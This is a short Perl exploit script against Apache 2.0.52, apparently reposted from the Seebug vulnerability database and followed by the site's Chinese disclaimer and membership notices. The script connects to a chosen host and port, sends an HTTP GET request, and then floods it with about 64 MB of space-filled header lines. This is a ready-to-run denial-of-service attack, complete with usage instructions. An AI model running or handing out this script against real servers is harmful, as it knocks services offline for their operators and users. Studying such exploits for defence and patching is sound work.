#!/usr/bin/perl # Noam Rathaus of Beyond Security Ltd. # use strict; use IO::Socket::INET; usage() unless (@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to the host.\n"; $socket->autoflush(1); print "Sending...\n"; print $socket "GET / HTTP/1.0\n"; for (my $count = 0; $count < 8000; $count++) { if ($count % 10 == 0) { print "."; } print $socket (" "x8000)."\n"; } print $socket "\n"; print "Done.\n"; while (<$socket>) { print $_; } close($socket); exit(0); sub usage { print "\nApache 2.0.52 8000x\" \" DoS attack\n"; print "\nUsage: apache_xpl.pl [host] [port]\n"; print "\n"; exit(1); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论